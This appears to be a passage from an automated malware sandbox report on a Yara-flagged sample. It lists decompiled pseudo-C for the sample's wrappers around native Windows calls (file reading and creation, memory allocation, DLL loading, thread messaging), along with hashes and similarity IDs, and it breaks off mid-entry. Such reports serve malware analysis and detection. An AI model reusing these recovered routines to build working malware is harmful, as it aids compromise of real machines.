                                                						asm("cdq");
                                                						E01231E50( *(_t292 + _v8 * 4 - 0x70) / 0xa,  *(_t292 + _v8 * 4 - 0x70) / 0xa,  &_v92);
                                                						asm("cdq");
                                                						E01231E40( *(_t292 + _v8 * 4 - 0x70) / 0xa,  *(_t292 + _v8 * 4 - 0x70) % 0xa,  &_v32);
                                                						E01238140(_t292 + _v8 * 0x1e - 0x13c,  &_v32);
                                                						_t294 = _t294 + 8;
                                                					} else {
                                                						E01231E40( &_v32,  *(_t292 + _v8 * 4 - 0x70),  &_v32);
                                                					}
                                                					_v8 = _v8 - 1;
                                                				}
                                                				_v8 = 0;
                                                				while(_v8 < 5) {
                                                					_t189 = E012382C0(_t292 + _v8 * 0x1e - 0x13c);
                                                					_t294 = _t294 + 4;
                                                					_v68 = _t189;
                                                					if(_v68 != 0) {
                                                						E01238140( &_v168, _t292 + _v8 * 0x1e - 0x13c);
                                                						E01238140( &_v168,  &_v80);
                                                						_t294 = _t294 + 0x10;
                                                					}
                                                					_v8 = _v8 + 1;
                                                				}
                                                				E01238140(_a12,  &_v64);
                                                				_t186 = E012382C0(_a12);
                                                				 *((char*)(_a12 + _t186 - 1)) = 0;
                                                				return _t186;
                                                			}



































                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: _memset
                                                • String ID: Hundred $Hundred
                                                • API String ID: 2102423945-1478457770
                                                • Opcode ID: fcdceea0351b5c3b9327cc6a9b04200c4f58c3b79de828819dc5718090bed5b8
                                                • Instruction ID: bf70320638243ae354252fbc0b49d0d291aebe6d83daf9c5f2d28ace7bd73fee
                                                • Opcode Fuzzy Hash: fcdceea0351b5c3b9327cc6a9b04200c4f58c3b79de828819dc5718090bed5b8
                                                • Instruction Fuzzy Hash: CBA162F1E10209EFCF08DFE8D881BEDB7B6AF98300F108569E515A7240EB759A15CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 78%
                                                			E0123F71C(void* __ebx, void* __edx, void* __esi, void* __eflags) {
                                                				intOrPtr* _v20;
                                                				void* _t4;
                                                				intOrPtr* _t7;
                                                				intOrPtr _t9;
                                                
                                                				_t15 = __edx;
                                                				_t13 = __ebx;
                                                				_t4 = E01243C1F(0, 0x10000, 0x30000);
                                                				if(_t4 != 0) {
                                                					_push(0);
                                                					_push(0);
                                                					_push(0);
                                                					_push(0);
                                                					_push(0);
                                                					E01238B87(__ebx, __edx);
                                                					asm("int3");
                                                					_t7 =  *_v20;
                                                					__eflags =  *_t7 - 0xe06d7363;
                                                					if( *_t7 != 0xe06d7363) {
                                                						L9:
                                                						__eflags = 0;
                                                						return 0;
                                                					} else {
                                                						__eflags =  *((intOrPtr*)(_t7 + 0x10)) - 3;
                                                						if( *((intOrPtr*)(_t7 + 0x10)) != 3) {
                                                							goto L9;
                                                						} else {
                                                							_t9 =  *((intOrPtr*)(_t7 + 0x14));
                                                							__eflags = _t9 - 0x19930520;
                                                							if(__eflags == 0) {
                                                								L10:
                                                								E0123C6A9(_t13, _t15, 0, __eflags);
                                                								asm("int3");
                                                								E0123C080(E0123F743);
                                                								__eflags = 0;
                                                								return 0;
                                                							} else {
                                                								__eflags = _t9 - 0x19930521;
                                                								if(__eflags == 0) {
                                                									goto L10;
                                                								} else {
                                                									__eflags = _t9 - 0x19930522;
                                                									if(__eflags == 0) {
                                                										goto L10;
                                                									} else {
                                                										__eflags = _t9 - 0x1994000;
                                                										if(__eflags == 0) {
                                                											goto L10;
                                                										} else {
                                                											goto L9;
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					return _t4;
                                                				}
                                                			}








                                                APIs
                                                • __controlfp_s.LIBCMT ref: 0123F72A
                                                  • Part of subcall function 01243C1F: __control87.LIBCMT ref: 01243C43
                                                • __invoke_watson.LIBCMT ref: 0123F73D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: __control87__controlfp_s__invoke_watson
                                                • String ID: csm
                                                • API String ID: 1371525046-1018135373
                                                • Opcode ID: fa131dffc4bd09db79010682cd5662efd73d2b4268884cf89ca45d25eb5babb5
                                                • Instruction ID: cac245fbcc987b2affc1d2901390355be7cad308c80296496929e8e2425ef860
                                                • Opcode Fuzzy Hash: fa131dffc4bd09db79010682cd5662efd73d2b4268884cf89ca45d25eb5babb5
                                                • Instruction Fuzzy Hash: 1DF024F19303071B8B2F996DBB44ABE378D9FE0111FA40512E708CE521DB10C681C0D7
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Executed Functions

                                                C-Code - Quality: 37%
                                                			E00419FDC(void* __eax, void* __ebx, void* __ecx, void* _a4, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a36, void* _a40, void* _a44) {
                                                
                                                				asm("outsd");
                                                				if (__ebx + 1 >= 0) goto L4;
                                                			}




                                                APIs
                                                • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 0041A025
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: BMA$BMA
                                                • API String ID: 2738559852-2163208940
                                                • Opcode ID: 186d4900891e41f7d0a5b6e498487b00eac1fa0112921c4b2a47906599fd03e7
                                                • Instruction ID: 484b6426c2f396df637221c1b542eae7c99e1a8ad17ede016dac9c88e00d6fb1
                                                • Opcode Fuzzy Hash: 186d4900891e41f7d0a5b6e498487b00eac1fa0112921c4b2a47906599fd03e7
                                                • Instruction Fuzzy Hash: 180129B2200104AFCB14DF99DC95EEB77A9EF8C364F058659BA1D97241D630E9118BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 0041A025
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: BMA$BMA
                                                • API String ID: 2738559852-2163208940
                                                • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                • Instruction ID: 370e936de0c6b30a0e9c68c176e8d16dab5dfb862c4be705976860dd555c5517
                                                • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                • Instruction Fuzzy Hash: DCF0A4B2210208ABCB14DF89DC91EEB77ADAF8C754F158249BA1D97241D630E8518BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 0041A025
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: BMA$BMA
                                                • API String ID: 2738559852-2163208940
                                                • Opcode ID: e93340b54edd0e397a6388d217535b99c41eb399cd2601d53624c99cf8a53c24
                                                • Instruction ID: c27302ad052d1d1f2e6217c30eb68fe5cd20bea1afe8e39536764aa01b7a8a30
                                                • Opcode Fuzzy Hash: e93340b54edd0e397a6388d217535b99c41eb399cd2601d53624c99cf8a53c24
                                                • Instruction Fuzzy Hash: 40F098B2214109ABCB04DF99DC90EEB77ADAF8C314F158249FA1DA3241C634E8528BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 21%
                                                			E0041A08A(void* __eax, void* __eflags, void* _a4, PVOID* _a8, long _a12, long* _a16, long _a20, long _a24) {
                                                				intOrPtr _v0;
                                                				long _t24;
                                                				void* _t43;
                                                				void* _t44;
                                                				intOrPtr* _t48;
                                                				void* _t50;
                                                
                                                				asm("pushad");
                                                				if(__eflags != 0) {
                                                					asm("out dx, eax");
                                                					_push(_t50);
                                                					_t20 = _v0;
                                                					_push(0xec8b5542);
                                                					_t12 = _t20 + 0xc60; // 0xca0
                                                					E0041AB30(_t43, _v0, _t12,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x30);
                                                					_t24 = NtAllocateVirtualMemory(_a4, _a8, _a12, _a16, _a20, _a24); // executed
                                                					return _t24;
                                                				} else {
                                                					asm("int1");
                                                					asm("rcl byte [ebp-0x75], 1");
                                                					_t25 = _v0;
                                                					_t48 = _v0 + 0xc58;
                                                					E0041AB30(_t43, _v0, _t48,  *((intOrPtr*)(_t25 + 0x10)), 0, 0x2e);
                                                					return  *((intOrPtr*)( *_t48))(_a4, _a8, _a12, _a16, _a20, _a24, _t44, _t50);
                                                				}
                                                			}










                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AD04,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 0041A149
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 52%
                                                			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
                                                				intOrPtr _v8;
                                                				struct _EXCEPTION_RECORD _v12;
                                                				struct _OBJDIR_INFORMATION _v16;
                                                				char _v536;
                                                				intOrPtr* _t14;
                                                				void* _t15;
                                                				struct _OBJDIR_INFORMATION _t17;
                                                				struct _OBJDIR_INFORMATION _t18;
                                                				void* _t30;
                                                				void* _t31;
                                                				void* _t32;
                                                
                                                				_push(_a8);
                                                				_t14 =  &_v536;
                                                				_push(0x104);
                                                				 *_t14 =  *_t14 + _t14;
                                                				_push( &_v12);
                                                				_v8 = _t14;
                                                				_t15 = E0041C820();
                                                				_t31 = _t30 + 0xc;
                                                				if(_t15 != 0) {
                                                					_t17 = E0041CC40(__eflags, _v8);
                                                					_t32 = _t31 + 4;
                                                					__eflags = _t17;
                                                					if(_t17 != 0) {
                                                						E0041CEC0( &_v12, 0);
                                                						_t32 = _t32 + 8;
                                                					}
                                                					_t18 = E0041B070(_v8);
                                                					_v16 = _t18;
                                                					__eflags = _t18;
                                                					if(_t18 == 0) {
                                                						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                						return _v16;
                                                					}
                                                					return _t18;
                                                				} else {
                                                					return _t15;
                                                				}
                                                			}














                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00419F30(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                				long _t21;
                                                				void* _t31;
                                                
                                                				_t3 = _a4 + 0xc40; // 0xc40
                                                				E0041AB30(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                				return _t21;
                                                			}





                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419F7D
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0041A110(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                				long _t14;
                                                				void* _t21;
                                                
                                                				_t3 = _a4 + 0xc60; // 0xca0
                                                				E0041AB30(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                				return _t14;
                                                			}





                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AD04,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 0041A149
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0041A060(intOrPtr _a4, void* _a8) {
                                                				long _t8;
                                                				void* _t11;
                                                
                                                				_t5 = _a4;
                                                				_t2 = _t5 + 0x10; // 0x300
                                                				_t3 = _t5 + 0xc50; // 0x40a923
                                                				E0041AB30(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                				_t8 = NtClose(_a8); // executed
                                                				return _t8;
                                                			}





                                                APIs
                                                • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 0041A085
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709683230.0000000001920000.00000040.00000001.sdmp, Offset: 01920000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%


                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0327286b03ad3413f637a2475f25f286d9bf62369b9ecfde997da3914e589c74
                                                • Instruction ID: 432e1ce9d525f57aefaca7daa4fe6280bf22d9d084bd04ba996dfdd8e8b53d12
                                                • Opcode Fuzzy Hash: 0327286b03ad3413f637a2475f25f286d9bf62369b9ecfde997da3914e589c74
                                                • Instruction Fuzzy Hash: 4F210CB2D4020857CB25D665AD42BEF737CAB54318F04017FE949A3182F638BE49CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A26D
                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A2A8
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: ExitFreeHeapProcess
                                                • String ID:
                                                • API String ID: 1180424539-0
                                                • Opcode ID: 250ef18c556ba02e814dab3b4aecc19de277be39554cece91c375ae2bac7ee4d
                                                • Instruction ID: 547a9b8b68c9010547b339b3cb529d0b91f2f117204a37f4204373e2dfc76596
                                                • Opcode Fuzzy Hash: 250ef18c556ba02e814dab3b4aecc19de277be39554cece91c375ae2bac7ee4d
                                                • Instruction Fuzzy Hash: FE016D752102047BD724DF69CC85FEB37A9EF48750F058199BA596B382C631EA11CBF1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 28%
                                                			E0041A233(void* __ebx, intOrPtr __edx, void* _a8, void* _a12, void* _a16, void* _a20) {
                                                				char _v1;
                                                				char* _t29;
                                                
                                                				asm("scasd");
                                                				asm("out 0xeb, al");
                                                				_t29 =  &_v1;
                                                				 *((intOrPtr*)(__ebx + 0x35e0edd3)) = __edx;
                                                				asm("aad 0x86");
                                                				if (_t29 >= 0) goto L4;
                                                				_push(_t29);
                                                			}






                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A26D
                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A2A8
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: ExitFreeHeapProcess
                                                • String ID:
                                                • API String ID: 1180424539-0
                                                • Opcode ID: ad134962489c4b0be910909cb3bc786af8e452fdec099d3a1fbaeeacbbdd7ab3
                                                • Instruction ID: 9f10a431267118275e9ad7371f05e8955491781adb6bddcdcab8ee9240746023
                                                • Opcode Fuzzy Hash: ad134962489c4b0be910909cb3bc786af8e452fdec099d3a1fbaeeacbbdd7ab3
                                                • Instruction Fuzzy Hash: 2CF0B4B52042146BCB24EF65CD45E973B6CEF89350F418699FD494B342C230E921CBF1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E00407E80(void* _a4, struct _SECURITY_DESCRIPTOR* _a8) {
                                                				DWORD* _t12;
                                                				void* _t15;
                                                				struct _SECURITY_DESCRIPTOR* _t23;
                                                				int _t24;
                                                				void* _t32;
                                                				DWORD** _t36;
                                                				void* _t37;
                                                				void* _t38;
                                                				void* _t39;
                                                
                                                				_t36 = _a8;
                                                				if(_t36 != 0) {
                                                					_t32 = _a4;
                                                					 *_t36 = 0;
                                                					_a8 = 0x10000;
                                                					_t12 = E0041B910(_t32, 0, 0x10000, 0x1000, 4); // executed
                                                					_t38 = _t37 + 0x14;
                                                					 *_t36 = _t12;
                                                					if(_t12 == 0) {
                                                						L6:
                                                						return 0;
                                                					} else {
                                                						while(1) {
                                                							_t15 = E00419A90(_t32, 5,  *_t36, _a8, 0); // executed
                                                							_t39 = _t38 + 0x14;
                                                							if(_t15 != 0xc0000004) {
                                                								break;
                                                							}
                                                							E0041A190(_t32,  *_t32, _t36,  &_a8, 0x8000); // executed
                                                							_push(4);
                                                							_t23 = _a8 + 0x10000;
                                                							_push(0x1000);
                                                							 *_t36 = 0;
                                                							_a8 = _t23;
                                                							_t24 = SetUserObjectSecurity(_t32, 0, _t23); // executed
                                                							_t38 = _t39 + 0x28;
                                                							 *_t36 = _t24;
                                                							if(_t24 != 0) {
                                                								continue;
                                                							} else {
                                                								goto L6;
                                                							}
                                                							goto L10;
                                                						}
                                                						if(_t15 >= 0) {
                                                							_t36[3] =  *_t36;
                                                							_t36[1] = _a8;
                                                							return 1;
                                                						} else {
                                                							E0041A190(_t32,  *_t32, _t36,  &_a8, 0x8000);
                                                							 *_t36 = 0;
                                                							return 0;
                                                						}
                                                					}
                                                				} else {
                                                					return 0;
                                                				}
                                                				L10:
                                                			}













                                                APIs
                                                • SetUserObjectSecurity.USER32 ref: 00407F0A
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: ObjectSecurityUser
                                                • String ID:
                                                • API String ID: 3368538905-0
                                                • Opcode ID: acb12e98be2c78d1dd8805e6af08001e4c68e39effe5ce95b08ee45ff6ef72b7
                                                • Instruction ID: 0e1586888c10476cb595f787793831b7260d85e8fa1732002c5f65dd8b7c06a6
                                                • Opcode Fuzzy Hash: acb12e98be2c78d1dd8805e6af08001e4c68e39effe5ce95b08ee45ff6ef72b7
                                                • Instruction Fuzzy Hash: D221A4B16402057BE720DE59DC41FABB3A8DF54764F10842FFA88DB281E7B4E9808B95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 63%
                                                			E004082E8(intOrPtr* __esi, intOrPtr _a4, long _a8) {
                                                				char _v67;
                                                				char _v68;
                                                				void* _t12;
                                                				int _t13;
                                                				signed char _t14;
                                                				long _t20;
                                                				void* _t23;
                                                				int _t26;
                                                				void* _t29;
                                                				void* _t31;
                                                
                                                				_t23 = __esi +  *__esi;
                                                				asm("cli");
                                                				asm("sbb byte [ebp+0x55942fa6], 0x8b");
                                                				_t29 = _t31;
                                                				_push(_t23);
                                                				_v68 = 0;
                                                				E0041BA30( &_v67, 0, 0x3f);
                                                				E0041C5D0( &_v68, 3);
                                                				_t25 = _a4 + 0x1c;
                                                				_t12 = E0040ACD0(_a4 + 0x1c, _a4 + 0x1c,  &_v68); // executed
                                                				_t13 = E00414E20(_t25, _t12, 0, 0, 0xc4e7b6d6);
                                                				_t26 = _t13;
                                                				if(_t26 != 0) {
                                                					_t20 = _a8;
                                                					_t13 = PostThreadMessageW(_t20, 0x111, 0, 0); // executed
                                                					_t38 = _t13;
                                                					if(_t13 == 0) {
                                                						_t14 = E0040A460(_t38, 1, 8);
                                                						_t13 =  *_t26(_t20, 0x8003, _t29 + (_t14 & 0x000000ff) - 0x40, _t13);
                                                					}
                                                				}
                                                				return _t13;
                                                			}














                                                APIs
                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: 09bf45a94f708fda496999d8cc4cc41b8bf14f77805b9a6c0b5e4b80a5621006
                                                • Instruction ID: f48dc97511caad6c3d3801281bc7feabef1a3c7d088df38675d2db30e286f357
                                                • Opcode Fuzzy Hash: 09bf45a94f708fda496999d8cc4cc41b8bf14f77805b9a6c0b5e4b80a5621006
                                                • Instruction Fuzzy Hash: 74012D31A803287BEB20A6A58C02FFE7B1CAF40F55F04411EFF04BA1C1D6A9690547E9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 82%
                                                			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
                                                				char _v67;
                                                				char _v68;
                                                				void* _t12;
                                                				intOrPtr* _t13;
                                                				int _t14;
                                                				signed char _t15;
                                                				long _t21;
                                                				intOrPtr* _t25;
                                                				void* _t26;
                                                
                                                				_v68 = 0;
                                                				E0041BA30( &_v67, 0, 0x3f);
                                                				E0041C5D0( &_v68, 3);
                                                				_t24 = _a4 + 0x1c;
                                                				_t12 = E0040ACD0(_a4 + 0x1c, _a4 + 0x1c,  &_v68); // executed
                                                				_t13 = E00414E20(_t24, _t12, 0, 0, 0xc4e7b6d6);
                                                				_t25 = _t13;
                                                				if(_t25 != 0) {
                                                					_t21 = _a8;
                                                					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                					_t33 = _t14;
                                                					if(_t14 != 0) {
                                                						L5:
                                                						return _t14;
                                                					}
                                                					_t15 = E0040A460(_t33, 1, 8);
                                                					_t14 =  *_t25(_t21, 0x8003, _t26 + (_t15 & 0x000000ff) - 0x40, _t14);
                                                					goto L5;
                                                				}
                                                				return _t13;
                                                			}













                                                APIs
                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: 0bfa4e74d4fa1a6ebe56472b901301c3cf37ddf70bb540388544bf445b19770a
                                                • Instruction ID: 1050077c77294267169ebb916dfae3a1405fb9879d8789690f6f999e3cf74240
                                                • Opcode Fuzzy Hash: 0bfa4e74d4fa1a6ebe56472b901301c3cf37ddf70bb540388544bf445b19770a
                                                • Instruction Fuzzy Hash: AD01D831A8032877E720A6959C03FFE771C6B40F54F044019FF04BA1C1E6A8690546EA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 26%
                                                			E004082B3(void* __eax, void* __ecx, void* __edx, void* __esi, void* __eflags) {
                                                				int _t10;
                                                				signed char _t11;
                                                				long _t20;
                                                				int _t25;
                                                				void* _t28;
                                                
                                                				asm("int 0xd3");
                                                				if(__eflags >= 0) {
                                                					_t10 = E00414E20(__eax, __esi, 0, 0, 0xc4e7b6d6);
                                                					_t25 = _t10;
                                                					__eflags = _t25;
                                                					if(_t25 != 0) {
                                                						_t20 =  *(_t28 + 0xc);
                                                						_t10 = PostThreadMessageW(_t20, 0x111, 0, 0); // executed
                                                						__eflags = _t10;
                                                						if(__eflags == 0) {
                                                							_t11 = E0040A460(__eflags, 1, 8);
                                                							_t10 =  *_t25(_t20, 0x8003, _t28 + (_t11 & 0x000000ff) - 0x40, _t10);
                                                						}
                                                					}
                                                					return _t10;
                                                				} else {
                                                					asm("daa");
                                                					if(__eflags > 0) {
                                                						asm("clc");
                                                						asm("std");
                                                						asm("invalid");
                                                						_push(__ecx);
                                                						E0041B9B0();
                                                						return 0;
                                                					} else {
                                                						__esi = __eax;
                                                						__eax = E0041B320(__ecx);
                                                						__eax = __eax + __esi + 0x1000;
                                                						__esi = __esi;
                                                						return __eax; // executed
                                                					}
                                                				}
                                                			}









                                                APIs
                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: 31d608a49065a52b608442d183ce0a90ff4413927e247e9710dd0310ee6f55e1
                                                • Instruction ID: bdd69d18f858de0f0da4d4c3ee629ba13c87c32b621c0d2d7e69cf2947c9496e
                                                • Opcode Fuzzy Hash: 31d608a49065a52b608442d183ce0a90ff4413927e247e9710dd0310ee6f55e1
                                                • Instruction Fuzzy Hash: 56F02836A406243AE62065756C03FFE62589B85F55F05407FFF40FA2C1EAA9982542E9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A26D
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                • Instruction ID: 8b4701b4f03220052e2b3b5ed4c672ef58e2eb60ff823c8fb6afa074398e137c
                                                • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                • Instruction Fuzzy Hash: DCE04FB12102046BD714DF59CC45EE777ADEF88750F014559FE0857241C630F910CAF0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0041A200(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                				void* _t10;
                                                				void* _t15;
                                                
                                                				E0041AB30(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                				return _t10;
                                                			}






                                                APIs
                                                • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A22D
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                • Instruction ID: 4224f920e4464a65d08b1d76aaa125f94db740d8927d38e6c7d6b62f4195d12c
